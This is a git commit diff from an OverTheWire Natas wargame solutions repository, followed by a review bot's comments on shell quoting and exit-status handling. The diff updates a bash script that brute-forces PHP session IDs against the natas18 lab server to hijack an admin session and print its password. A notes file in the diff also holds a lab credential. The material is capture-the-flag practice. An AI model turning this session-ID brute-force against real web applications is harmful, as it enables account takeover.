<Natas> scripts/natas18.sh(working)

Emile Clark-Boman 2025-07-16 00:21:18 +10:00
parent 42ecc035b5
commit 9cd4fbcbf5
2 changed files with 11 additions and 6 deletions


@ -72,7 +72,6 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
Another oracle attack using an SQL injection AND this time Another oracle attack using an SQL injection AND this time
using a timing based attack. using a timing based attack.
NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
natas19: natas19:
natas20: natas20:


@ -6,7 +6,7 @@ USERNAME="admin"
PASSWORD="arbitrary" PASSWORD="arbitrary"
req() { req() {
local SESSION_ID=$1 SESSION_ID=$1
curl http://natas18.natas.labs.overthewire.org/index.php \ curl http://natas18.natas.labs.overthewire.org/index.php \
-X POST \ -X POST \
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \ -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
@ -14,13 +14,19 @@ req() {
-d "password=$PASSWORD" \ -d "password=$PASSWORD" \
--cookie "PHPSESSID=$SESSION_ID" \ --cookie "PHPSESSID=$SESSION_ID" \
-sS \ -sS \
| grep "regular user" &>/dev/null | grep "Password: "
} }
MIN_ID=0 MIN_ID=0
MAX_ID=640 MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
printf "Attempt: %2d" $i printf "Attempt: %2d" $i
req "$i" && echo -en '\r' || $(echo " [admin]"; break) OUT=$(req "$i")
if [ $? -ne 0 ]; then
echo -en '\r'
else
echo " [admin]"
echo $OUT | awk '{print substr($2,1,32)}'
break
fi
done done
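Review bot: In the new success branch, `echo $OUT | awk '{print substr($2,1,32)}'` expands the HTTP response unquoted, so the shell word-splits it and glob-expands any `*`, `?` or `[` in the server-controlled text against the working directory before awk sees it; `printf '%s\n' "$OUT" | awk '{print substr($2,1,32)}'` passes the response through unchanged. The `OUT=$(req "$i")` / `if [ $? -ne 0 ]` pair tests only grep's exit status, so a curl failure looks the same as "no match" and that ID is silently skipped; `if OUT=$(req "$i"); then` is the more direct form, and `req` would need to check curl's own status before grepping to tell the two cases apart. The earlier hunk in this file also appears to drop `local` from `SESSION_ID=$1` inside `req`, which would make the variable global; keep `local SESSION_ID=$1` unless that was intended.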